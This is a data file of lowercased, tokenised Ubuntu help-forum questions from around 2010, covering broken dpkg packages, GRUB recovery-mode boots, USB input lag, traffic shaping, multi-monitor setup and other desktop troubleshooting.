5058	how to fix a dpkg broken by the brother mfc-7340 deb driver	i 'm getting an apt-get error that says e : the package brmfc7340lpr needs to be reinstalled , but i ca n't find an archive for it . the brmfc7340lpr is a printer driver -- it 's a local deb file . doing a dpkg or apt-get purge does n't work , neither does apt-get install -f . how do i reinstall a package from a local deb file ? output : box-name % sudo apt-get upgrade [ sudo ] password for username : reading package lists ... done building dependency tree reading state information ... done e : the package brmfc7340lpr needs to be reinstalled , but i ca n't find an archive for it . box-name % sudo apt-get purge brmfc7340lpr reading package lists ... done building dependency tree reading state information ... done e : the package brmfc7340lpr needs to be reinstalled , but i ca n't find an archive for it . box-name % sudo dpkg -- purge brmfc7340lpr dpkg : error processing brmfc7340lpr ( -- purge ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . errors were encountered while processing : brmfc7340lpr box-name % sudo dpkg -- install brmfc7340lpr-2.0.2-1.i386.deb selecting previously deselected package brmfc7340lpr . ( reading database ... 725204 files and directories currently installed . ) preparing to replace brmfc7340lpr 2.0.2-1 ( using ... /brmfc7340lpr-2.0.2-1.i386.deb ) ... unpacking replacement brmfc7340lpr ... start : unknown job : lpd dpkg : warning : subprocess old post-removal script returned error exit status 1 dpkg - trying script from the new package instead ... start : unknown job : lpd dpkg : error processing brmfc7340lpr-2.0.2-1.i386.deb ( -- install ) : subprocess new post-removal script returned error exit status 1 start : unknown job : lpd dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : brmfc7340lpr-2.0.2-1.i386.deb box-name % sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done e : the package brmfc7340lpr needs to be reinstalled , but i ca n't find an archive for it . box-name %
5065	how can i disable the purple splash screen at boot ?	how can i disable the purple `` ubuntu '' splash screen that displays at boot before the login screen has loaded ? i 'd prefer to just see plain text scroll by .
5069	ca n't set permissions for files on an ntfs partition	i remember that i was able to run a linux .exe that was placed on an ntfs partition earlier before i installed 10.10 rc . but if i try to run it now , i ca n't run it as it has n't the execution permission . the bad part is that i ca n't change the permissions too . i 'm chmod-ding +x but no change at all with its permissions . so this seems to be a bug ? any help ? though when i put it on ext4 partition , i can set the permission . but i want to do this as i did before , right from its default ntfs location .
5071	no volume in kubuntu 10.04	i am having both gnome and kde on my system . my gnome desktop is working perfectly but in kde here is no sound being generated . output of apley -l and lspci commands is as follows.. neha @ neha-laptop : ~ $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : intel hdmi [ intel hdmi ] subdevices : 1/1 subdevice # 0 : subdevice # 0 and output of lspci command is : neha @ neha-laptop : ~ $ lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hem ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) sata ahci controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 02:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 02:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 02:09.2 system peripheral : ricoh co ltd r5c843 mmc host controller ( rev 12 ) 02:09.3 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 02:09.4 system peripheral : ricoh co ltd xd-picture card controller ( rev ff ) 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller ( rev 12 ) 0b:00.0 network controller : broadcom corporation bcm4312 802.11a/b/g ( rev 01 ) what could be the problem ?
5075	best way to remote login on a ubuntu machine from ubuntu/windows and osx	we have set up a ubuntu workstation with accounts for all the group members . nxserver from nomachine seems to be what we need , but it is restricted to 2 users . freenx is n't easily installable and does n't seem very reliable . vnc seems to be usable for login to existing open session but not for remote logins on a single workstation . to be clear , we need a solution to login on a workstation , desktop maintenance is n't necessary at all . cheers , fred
5077	is it possible to setup/emulate a special windows printer driver for activex elements in ie ob wine ?	i have a zebra tlp thermal printer ( lpt-attached ) and a proprietary business web application using an activex element to print on it . is there a way to make it work on linux ? if there was , then i could probably extinguish windows in my company !
5078	why is 'libgnomevfs ' files under /usr/include/gnome-vfs-2.0 ?	most applications , including the gnomevfs headers themselves , expect the files to be under /usr/include/libgnomevfs , but ubuntu has them under /usr/include/gnome-vfs-2.0/libgnomevfs . why ? the package i 'm referring to is called libgnomevfs2 . inside /usr/include/gnome-vfs-2.0/libgnomevfs/gnome-vfs.h` we find : # include < libgnomevfs/gnome-vfs-acl.h > # include < libgnomevfs/gnome-vfs-address.h > # include < libgnomevfs/gnome-vfs-async-ops.h > # include < libgnomevfs/gnome-vfs-cancellation.h > ... meaning that even the headers themselves expect the files to be in that location - and nothing that includes this file will work . am i missing something , or is this a glitch ?
5080	add volume control to desktop panel indicator ?	i recently upgrade to ubuntu 10.04 and i noticed that i 'm no longer able to add a volume control to my desktop panels . when i right click the panel and choose `` add to panel '' there is no longer a volume control in the list . how do i add a volume control to my desktop panel ?
5082	can i set up 2 monitors to be 2 separate gnome virtual desktops instead of one big ?	if i plug an external crt to my laptop , it normally either displays the same picture as the laptop 's panel , or extends the desktop area . but i 'd like it to be a separate virtual desktop ( a workspace , in terms of gnome ) . is it possible ? i use toshiba l10 laptop with intel 82852/855gm onboard card . and i switch ( which , afaik , can be an inconvenience with xinerama ) monitor configurations ( detach all monitors but a laptop 's built-in panel , attach monitors with different resolutions ) pretty often ( sometimes many times a day ) .
5083	can i set up nautilus to use a midnight commander-like hot keys scheme for 2-panel mode ?	i have been using `` commanders '' with dos and windows for more than 15 years . needless to say it 'd significantly improve my comfort if i could be able to create directories by pressing f7 , deleting by f8 , copying ( to an opposite panel ) by f5 and moving by f6 . i was very pleased by nautilus to introduce a 2-panel view , but disappointed by lack of traditional `` commander '' f-keys scheme . can i correct this without editing and recompiling nautilus sources ?
5084	can i configure nautilus to step into archives instead of opening them in external file roller application window ?	midnight commander ( as well as all norton and total commanders i used to use with dos and windows ) provide a very pleasant facility of stepping into archives ( tar.gz , zip , 7z , rar , etc . ) and other containers ( as iso cd images ) and working with them much like plane directories . can nautilus be configured to behave so ?
5085	why to use ordinary kernel if there 's realtime one ?	what are benefits of an ordinary ubuntu kernel compared to realtime one ? what are realtime kernel 's tradeoffs ?
5086	ati drivers : delay when unminimizing	i installed the proprietary ati/amd fglrx graphics driver through `` jockey-gtk '' to get rid of my computer 's over heating problems . while my computer no longer overheats , i am stuck with a new problem : when i click on a minimized application in the task bar in order to restore it ( unminimize it ) , there is always a short delay of about 1 second . any suggestion on how to approach this problem ? 1 second might not seem so bad but for a power user it is : )
5087	can i set up gnome to pop-up its main menu anywhere when i right-click on desktop , and apps ( windows ) list on middle-click ?	in xfce it was very convenient to pop-up applications launcher menu and running applications list menu anywhere on desktop by right and middle click respectively . can be gnome configured to behave so ? i never put any files/folders on desktop , so i do n't need desktop context menu functionality . i also have a very big second monitor and am pretty disturbed by moving mouse over it to the first screen to use taskbar ( and placing taskbar on that second big screen wont help much , as it is still big ) .
5090	can i set different background images for different monitors ?	i use 2 displays - laptop 's built-in 1024x768 panel and external attached 1600x1200 crt . in xfce i could set different backdrops to these 2 . can i in gnome ?
5092	can i accelerate mouse sensetivity over the standard maximum ?	i 've used `` mouse preferences '' window to set mouse pointer acceleration and sensitivity sliders to their maximums , but i am still not satisfied with how fast does mouse pointer move ( i 've got a very big display ) . can i accelerate it over ?
5094	how to disable the ubuntu one file manager ribbon for specific folders ?	when i open downloads , pictures , music , or documents folders , i can see a thick beige ubuntu one bar on top of the folder 's workplace . this annoys me and , i have reasons to suppose , introduces some malfunctions . how to disable it ? i would n't like to totally remove ubuntu one as i think i can make use of it in future . but for sure i am very improbable to be willing to synchronise my downloads folder ever , as well as videos ( unless i get a gigabit internet connection , as it contains hundreds gigabytes ) .
5095	typing using key combinations ?	i 'm a ubuntu 10.04 user who is looking for a way to , for example , make my computer type a `` + '' character when i hold down the windows key ( i think it 's called super in linux world ) and press the k key . i need this to work in all applications . ( i 'm a person with a typing disability , and i need to adapt ubuntu to my needs . ) thanks !
5097	how do i use the new `` ubuntu font family '' in older releases ?	i want to use the new ubuntu fonts that are default in maverick in lucid . where to get it and how to install it ?
5104	how would i send all notifyosd message to a text file ?	how could i make notifyosd send all updates to a text file ( as well as do what it does ) ?
5108	no panels for other user in xubuntu	my xsession when logged in with other user than myself doesnot show the default two panels . all i get is the desktop with wallpaper . anyone got any idea what is wrong ? i am using xubuntu 10.04 . it doesnot happen while i setup a user and login with his/her name but after some times of logins .
5111	network traffic throttling using tc/tbf - unexpected results	in order to facilitiate some performance testing i am attempting to throttle the ip traffic on a particular machine - i want limit it to 1mbit/sec . i have a separate test machine where this command works just fine : tc qdisc add dev eth0 root tbf rate 1mbit burst 5kb latency 70ms peakrate 1.001mbit minburst 1540 on the real box where i want to apply this , i get weirdness . the exact same command limits traffic to 6kbit/sec . any ideas why ? unanme -a shows linux iperf1 2.6.18-128.el5pae # 1 smp wed dec 17 12:02:33 est 2008 i686 i686 i386 gnu/linux we have a three different ways of monitoring the throughput : the actual application we are testing which reports the throughput we see . we also some tivoli monitoring on a switch and we have an http client which downloads a file from an http server on the box in question . all three methods show 6kbs when the tbf is applied , and many mbs when we remove the tbf .
5112	scan many pages straight into a pdf	is there some easy to use program in ubuntu that can scan many pages straight into a pdf file ?
5116	grub boots into recovery mode	when i boot grub doesnt show up ( only ubuntu installed ) i would like grub to be shown for a second or 2 ( shift doesnt seem to bring it up ) . my main problem is that grub boots into what i assume to be recovery mode , i can login as myself and startx but that is obviously a right pain . could someone please advise me on how to remedy this problem ? grub.cfg : # # do not edit this file # # it is automatically generated by /usr/sbin/grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then load_env fi set default= '' 1 '' if [ $ { prev_saved_entry } ] ; then set saved_entry= $ { prev_saved_entry } save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z $ { boot_once } ] ; then saved_entry= $ { chosen } save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n $ { have_grubenv } ] ; then if [ -z $ { boot_once } ] ; then save_env recordfail ; fi ; fi } insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 insmod gfxterm insmod vbe if terminal_output gfxterm ; then true ; else # for backward compatibility with versions of terminal.mod that don't # understand terminal_output terminal gfxterm fi fi insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ $ { recordfail } = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.32-25-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba linux /boot/vmlinuz-2.6.32-25-generic root=uuid=1cd98d8a-97b3-4f25-9da2-e7128ef6dcba ro quiet splash initrd /boot/initrd.img-2.6.32-25-generic } menuentry 'ubuntu , with linux 2.6.32-25-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba echo 'loading linux 2.6.32-25-generic ... ' linux /boot/vmlinuz-2.6.32-25-generic root=uuid=1cd98d8a-97b3-4f25-9da2-e7128ef6dcba ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.32-25-generic } menuentry 'ubuntu , with linux 2.6.32-21-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba linux /boot/vmlinuz-2.6.32-21-generic root=uuid=1cd98d8a-97b3-4f25-9da2-e7128ef6dcba ro quiet splash initrd /boot/initrd.img-2.6.32-21-generic } menuentry 'ubuntu , with linux 2.6.32-21-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba echo 'loading linux 2.6.32-21-generic ... ' linux /boot/vmlinuz-2.6.32-21-generic root=uuid=1cd98d8a-97b3-4f25-9da2-e7128ef6dcba ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.32-21-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod ext2 set root= ' ( hd0,6 ) ' search -- no-floppy -- fs-uuid -- set 1cd98d8a-97b3-4f25-9da2-e7128ef6dcba linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ $ { timeout } ! = -1 ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # #
5119	change wallpaper based on times desktop has been shown	i want to create a wallpaper slide show that will not change five minutes after the wallpaper gets displayed , but five minutes after the entire desktop get viewed . does anyone know of a way to do this ?
5121	how do i report a bug ?	i found a problem with an application on ubuntu . questions : how do i best report the issue ? what sort of information should i provide ?
5130	why ca n't ubuntu see any free space ?	i 've got an external terabyte drive to store my scrap ( actually i mean a partition on it , i 've got some other partitions there ) . the fs used is ext3 . even after i delete some files there ( so there are at least some hundreds mibs free ) , nautilus shows zero free space there and does not allow to even create a directory . how to fix this ? i use ubuntu 10.10 daily build , last updated ton the day before yesterday ( oct 03 , 2010 ) .
5133	how to recover dpkg from corrupted downloads ?	i just upgraded to the 10.10 rc earlier and had a few problems with graphic drivers ( x didnt start ) but i have remedied that now . when i run 'sudo apt-get install -f ' i get this : will @ ubuntubox : /mnt/slax $ sudo apt-get install -f [ sudo ] password for will : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libmono-wcf3.0-cil openoffice.org-calc openoffice.org-core the following new packages will be installed : libmono-wcf3.0-cil the following packages will be upgraded : openoffice.org-calc openoffice.org-core 2 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 16 not fully installed or removed . need to get 0b/32.5mb of archives . after this operation , 1,929kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 201565 files and directories currently installed . ) preparing to replace openoffice.org-calc 1:3.2.1-6ubuntu2~10.04.1 ( using ... /openoffice.org-calc_1 % 3a3.2.1-7ubuntu1_i386.deb ) ... unpacking replacement openoffice.org-calc ... xz : ( stdin ) : compressed data is corrupt dpkg-deb : subprocess < decompress > returned error exit status 1 dpkg : error processing /var/cache/apt/archives/openoffice.org-calc_1 % 3a3.2.1-7ubuntu1_i386.deb ( -- unpack ) : short read on buffer copy for backend dpkg-deb during `./usr/lib/openoffice/basis3.2/program/libscfiltli.so' dpkg : regarding ... /openoffice.org-core_1 % 3a3.2.1-7ubuntu1_i386.deb containing openoffice.org-core : openoffice.org-core conflicts with openoffice.org-calc ( < < 1:3.2.1-7ubuntu1 ) openoffice.org-calc ( version 1:3.2.1-6ubuntu2~10.04.1 ) is present and installed . dpkg : error processing /var/cache/apt/archives/openoffice.org-core_1 % 3a3.2.1-7ubuntu1_i386.deb ( -- unpack ) : conflicting packages - not installing openoffice.org-core unpacking libmono-wcf3.0-cil ( from ... /libmono-wcf3.0-cil_2.6.7-3ubuntu1_all.deb ) ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:0 > : data error' dpkg-deb : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/libmono-wcf3.0-cil_2.6.7-3ubuntu1_all.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/openoffice.org-calc_1 % 3a3.2.1-7ubuntu1_i386.deb /var/cache/apt/archives/openoffice.org-core_1 % 3a3.2.1-7ubuntu1_i386.deb /var/cache/apt/archives/libmono-wcf3.0-cil_2.6.7-3ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea how i can get the broken packages fixed ? cheers , will
5134	usb keyboard and mouse both laggy	i decided to try out the ubuntu 10.10 rc on my workstation today . the install worked fine , but the mouse and keyboard ( both of which is usb ) are unbearably laggy . this was also the case when i ran it from the live cd . the strange part is that it works fine for the first few seconds when entering x . then something happens in the background , and the mouse all of a sudden behaves like i 'm playing some demanding 3d game on the highest setting . the keyboard is also laggy , and if i press more than a single key per second the key will be dropped , and only about every fifth character will actually appear on screen . even stranger is that this lag also is present when a use ctrl+alt+f1 to switch to console mode . if i immediately switch to console mode when booting , it works fine . then when i switch back to x , it takes a couple of seconds and then it happens again . i 've checked the logs , and the most suspicious message is : oct 3 20:16:16 churchill kernel : [ 70.868940 ] irq 19 : nobody cared ( try booting with the `` irqpoll '' option ) oct 3 20:16:16 churchill kernel : [ 70.868946 ] pid : 0 , comm : swapper not tainted 2.6.35-22-generic # 33-ubuntu oct 3 20:16:16 churchill kernel : [ 70.868948 ] call trace : oct 3 20:16:16 churchill kernel : [ 70.868950 ] < irq > [ < ffffffff810cba5b > ] __report_bad_irq+0x2b/0xa0 oct 3 20:16:16 churchill kernel : [ 70.868961 ] [ < ffffffff810cbc5c > ] note_interrupt+0x18c/0x1d0 oct 3 20:16:16 churchill kernel : [ 70.868967 ] [ < ffffffff81085d10 > ] ? sched_clock_tick+0x60/0x90 oct 3 20:16:16 churchill kernel : [ 70.868970 ] [ < ffffffff810cc45d > ] handle_fasteoi_irq+0xdd/0x110 oct 3 20:16:16 churchill kernel : [ 70.868974 ] [ < ffffffff8100cb12 > ] handle_irq+0x22/0x30 oct 3 20:16:16 churchill kernel : [ 70.868978 ] [ < ffffffff81590b2c > ] do_irq+0x6c/0xf0 oct 3 20:16:16 churchill kernel : [ 70.868981 ] [ < ffffffff81589713 > ] ret_from_intr+0x0/0x11 oct 3 20:16:16 churchill kernel : [ 70.868983 ] < eoi > [ < ffffffff810360fb > ] ? native_safe_halt+0xb/0x10 oct 3 20:16:16 churchill kernel : [ 70.868990 ] [ < ffffffff81012ecd > ] default_idle+0x3d/0x90 oct 3 20:16:16 churchill kernel : [ 70.868995 ] [ < ffffffff81008da3 > ] cpu_idle+0xb3/0x110 oct 3 20:16:16 churchill kernel : [ 70.868999 ] [ < ffffffff8156f6fa > ] rest_init+0x8a/0x90 oct 3 20:16:16 churchill kernel : [ 70.869004 ] [ < ffffffff81aedc9d > ] start_kernel+0x387/0x390 oct 3 20:16:16 churchill kernel : [ 70.869007 ] [ < ffffffff81aed341 > ] x86_64_start_reservations+0x12c/0x130 oct 3 20:16:16 churchill kernel : [ 70.869011 ] [ < ffffffff81aed43f > ] x86_64_start_kernel+0xfa/0x109 oct 3 20:16:16 churchill kernel : [ 70.869013 ] handlers : oct 3 20:16:16 churchill kernel : [ 70.869014 ] [ < ffffffff81404bb0 > ] ( usb_hcd_irq+0x0/0x90 ) oct 3 20:16:16 churchill kernel : [ 70.869019 ] [ < ffffffff81404bb0 > ] ( usb_hcd_irq+0x0/0x90 ) oct 3 20:16:16 churchill kernel : [ 70.869022 ] [ < ffffffff81404bb0 > ] ( usb_hcd_irq+0x0/0x90 ) oct 3 20:16:16 churchill kernel : [ 70.869026 ] disabling irq # 19 irq related issues , is from what i can tell , rather common . however , most of them seems to be related to shared interrupts , but on my computer irq 19 is used exclusively by the usb controller : root @ churchill : /home/emil # cat /proc/interrupts cpu0 0 : 26 io-apic-edge timer 1 : 2 io-apic-edge i8042 7 : 1 io-apic-edge parport0 8 : 0 io-apic-edge rtc0 9 : 1 io-apic-fasteoi acpi , firewire_ohci 12 : 4 io-apic-edge i8042 14 : 0 io-apic-edge pata_atiixp 15 : 1004 io-apic-edge pata_atiixp 17 : 154 io-apic-fasteoi ati ixp 18 : 6164 io-apic-fasteoi radeon , hda_intel 19 : 2000002 io-apic-fasteoi ehci_hcd : usb1 , ohci_hcd : usb2 , ohci_hcd : usb3 20 : 9097 io-apic-fasteoi eth0 , eth1 22 : 13702 io-apic-fasteoi sata_sil nmi : 0 non-maskable interrupts loc : 105505 local timer interrupts spu : 0 spurious interrupts pmi : 0 performance monitoring interrupts pnd : 0 performance pending work res : 0 rescheduling interrupts cal : 0 function call interrupts tlb : 0 tlb shootdowns trm : 0 thermal event interrupts thr : 0 threshold apic interrupts mce : 0 machine check exceptions mcp : 4 machine check polls err : 1 mis : 0 the on other person i 've been able to found that had similar problems resorted to using irqpoll , as suggested by the kernel message . however , he reported that the inputs did n't work at all without that option , which makes me suggest that this might not really be irq related after all . especially since it works fine for a while . lspci lists the usb controller as ati technologies inc ixp sb400 usb host controller . any suggestions would be greatly appreciated .
5136	how to remove all that country-specific dictionaries ( like en_au , en_ca , de_ch , etc ) ?	after i 've installed some language packs and spell checking dictionaries ( i 'd like to use with firefox and openoffice ) i 've got tons of language variations installed . this makes very inconvenient to maintain dictionary additions , for example . sometimes firefox decides to switch to australian , sometimes to uk dictionary , sometimes to us , etc . for me , a russian , english is just english , and german is just german . i think every english-speaking will understand me , may i write `` color '' or `` colour '' , `` dialog '' , or `` dialogue '' ( i usually prefer classic uk spelling though , as a matter of a habit ( as i was taught at school ) ) . how to remove all those dialects ?
5138	how do i best enable xinerama ?	following the wolph 's recommendation i am looking forward to enable xinerama to set up 2 monitors to be 2 separate gnome virtual desktops instead of one big . but the thing i worry about is how to set it up correctly and not to harm ubuntu 's `` monitor preferences '' application , panel indicator applet or anything else . if you have had any experience with xinerama , would you be so kind to share ? i use ubuntu 10.10 on my toshiba l10 laptop with intel 82852/855gm onboard card . and i switch ( which , afaik , can be an inconvenience with cinerama ) monitor configurations ( detach all monitors but a laptop 's built-in panel , attach monitors with different resolutions ) pretty often ( sometimes many times a day ) . as ubuntu was unable to detect my graphics , i was to create xorg.conf already , which has solved most of my graphics problems . the last time i have had experience with writing xorg.conf manually and setting up xinerama was about 7 years ago , with slackware and matrox mga g550 card . and i definitely would n't like to edit xorg.conf every time i need to switch my monitors configuration .
5140	how to set up ubuntu to automatically turn numlock on when an external keyboard is attached and off when it is not ?	having numlock on is convenient when using a full-sized external keyboard ( having a keypad ) and very inconvenient when using laptop 's built-in keyboard ( which places digits instead of letters on the keyboard 's right sid unless fn is pressed ) . so i have to turn numlock on every time i attach an external keyboard ( or boot with it attached ) and off every time i detach an external keyboard ( or boot with it detached ) . and i do this frequently because i prefer using a full-sized external keyboard , but have not enough ( only 3 ) usb ports to plug-in it alongside with a mouse , a 3g modem and an external hard/flash drive . can i automate this ? seems a very formaliseable , logically simple task : if there is an usb keyboard attached ( some device in /dev present ? ) - numlock is on , if not - numlock is off . my laptop 's built-in keyboard is ps/2-attached , external is usb . maybe i should code it myself , but where to put it in this case ? i use ubuntu 10.10 .
5141	profiling stock ubuntu kernel with sysprof : how ?	there are various system-wide debug tools ( sysprof , oprofile , systemtap ) that need debug symbols . getting debug symbols for userspace applications is easy : https : //wiki.ubuntu.com/debuggingprogramcrash the ddebs repository also contains linux-image- $ ( uname -r ) -dbgsym packages , but even if i install it , sysprof continues to show me unhelpful `` in kernel '' without detailed information . where can i get debug symbols that sysprof can use ? the systemtap package has a suggests : linux-debug-2.6 . apt-cache search fails to find anything called linux-debug-2.6 . is it available somewhere ? or is this an unproductive dead-end ? incidentally , oprofile can use the debug symbols from the above-mentioned dbgsym package , but not out of the box -- it wants /lib/modules/ $ ( uname -r ) /build/vmlinux , and i have to tell it to use use /usr/lib/debug/boot/vmlinux- $ ( uname -r ) -generic . but oprofile lacks a nice gui , so i 'd prefer sysprof . so , how can i convince sysprof to show me what 's happening in the kernel ?
5145	why do my avi files display with funky colors ?	when i capture hd video with a pentax dslr , and view it using vlc , it looks wrong - the green grass is purple , and the golden retriever is blue . this happens with vlc , totem , etc . there 's nothing wrong with the files themselves - the exact same files play fine on the mac or the pc . is there a way to fix this ?
5148	why does trash show some files even when there is nothing in it ?	why does trash show some files even when there is nothing inside the trash ?
5149	how to view an xps file ?	some times i have to deal with xps files ( xps is a microsoft 's rival to adobe 's pdf format , technically a zipped xaml ( xml ) ) . can i view them in ubuntu ? or , maybe , i could even produce them ?
5151	can i set up nautilus to use transparent background ?	i think it 'd be nice if nautilus windows could have semi-transparent backgrounds ( same as gnome terminal can ) for files and places lists . is it possible ?
5153	gwibber is not using indicator applet or loading on start up	i 'm currently using the 10.10 beta of ubuntu with the most recent updates installed . when i boot up the computer , gwibber fails to start up and when i do open it , it shows an icon in the notification area ( which i do not want ) and it does n't use the indicator applet at all ( even when closed ) .
5155	why are apt-get updates in development releases slower ?	when i update apt-get the universe repo takes ages to download , i usually max out at around 130kbps which can easily download ~4mb in under a minute yet it skips between going an bytes per second and under 30kpbs ( and i 'm not running anything that leaches my bandwidth when i update ) . updating on lucid was fine and took under 10 seconds why does it now take about 10 minutes ... will @ ubuntubox : ~ $ sudo apt-get update hit http : //archive.canonical.com maverick release.gpg ign http : //archive.canonical.com/ maverick/partner translation-en get:1 http : //ppa.launchpad.net maverick release.gpg [ 316b ] ign http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/ maverick/main translation-en_us get:2 http : //im.archive.ubuntu.com maverick release.gpg [ 198b ] ign http : //im.archive.ubuntu.com/ubuntu/ maverick/main translation-en hit http : //security.ubuntu.com maverick-security release.gpg ign http : //security.ubuntu.com/ubuntu/ maverick-security/main translation-en hit http : //extras.ubuntu.com maverick release.gpg ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //archive.canonical.com/ maverick/partner translation-en_us hit http : //archive.canonical.com maverick release get:3 http : //ppa.launchpad.net maverick release [ 57.3kb ] ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en_us hit http : //extras.ubuntu.com maverick release ign http : //im.archive.ubuntu.com/ubuntu/ maverick/main translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_us hit http : //archive.canonical.com maverick/partner i386 packages hit http : //extras.ubuntu.com maverick/main i386 packages ign http : //im.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick/universe translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick/universe translation-en_us hit http : //im.archive.ubuntu.com maverick-updates release.gpg ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en_us ign http : //im.archive.ubuntu.com/ubuntu/ maverick-updates/restricted 